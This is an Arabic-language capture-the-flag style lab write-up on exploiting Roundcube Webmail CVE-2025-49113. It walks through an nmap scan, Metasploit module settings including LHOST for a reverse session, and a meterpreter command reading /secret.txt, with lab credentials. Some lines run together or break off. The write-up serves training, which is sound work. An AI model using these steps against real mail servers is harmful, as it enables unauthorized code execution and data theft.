مختبر استغلال عملي لـ Roundcube Webmail CVE-2025-49113 (إلغاء تسلسل كائنات PHP بعد المصادقة ← RCE) لقراءة /secret.txt.
"إخلاء مسؤولية: للاستخدام التعليمي فقط"
يوثّق هذا المستودع استغلالي خطوة بخطوة لثغرة Roundcube Webmail CVE-2025-49113 في مختبر خاضع للتحكم للحصول على السر المخزَّن في /secret.txt.
⚠️ إخلاء مسؤولية
تم تنفيذ جميع الأعمال في بيئة مختبر / تدريب مُصرَّح لي باختبارها.
لا تستخدم هذه التقنيات ضد أنظمة لا تملكها أو لا تديرها.
Roundcube Webmail هو عميل بريد إلكتروني مفتوح المصدر يعمل عبر المتصفح بلغة PHP، ويتصل بصناديق البريد عبر IMAP ويرسل البريد عبر SMTP. يعمل عادةً على Apache أو Nginx مع MySQL/PostgreSQL/SQLite ويُستخدم على نطاق واسع في بيئات الاستضافة المشتركة.
الثغرة – CVE-2025-49113
تحتوي جميع إصدارات Roundcube حتى الإصدار 1.6.10 ضمناً (وإصدارات 1.5.x قبل 1.5.10) على خطأ حرج في program/actions/settings/upload.php. لا يتم التحقق من المعامل _from بشكل صحيح، مما يسمح لمهاجم مُصادَق بتشغيل وتحقيق بصلاحيات خادم الويب.
بيانات اعتماد المختبر:
roundcubercpassالهدف:
ما هو السر الموجود داخل ملف
/secret.txt؟
nmapmsfconsole (Metasploit 6)172.20.2.57exploit/multi/http/roundcube_auth_rce_cve_2025_49113الأمر: nmap -sV Target Machine
msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine
meterpreter > cat /secret.txt